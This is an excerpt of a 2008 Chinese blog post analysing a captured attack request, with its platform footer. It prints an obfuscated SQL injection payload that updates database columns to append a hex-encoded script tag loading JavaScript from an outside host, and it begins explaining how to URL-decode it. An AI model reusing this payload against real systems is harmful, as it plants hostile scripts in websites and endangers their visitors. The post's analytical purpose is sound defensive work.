摘要:
大概输入的一段参数
exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']
=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392
E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20f"
1:看到 %20%2b,很显然这是URLEncode,通过Server.UrlDecode方法解密得到
阅读全文
posted @ 2008-07-21 09:00 ∈鱼杆 阅读(404) 评论(2) 推荐(0) 编辑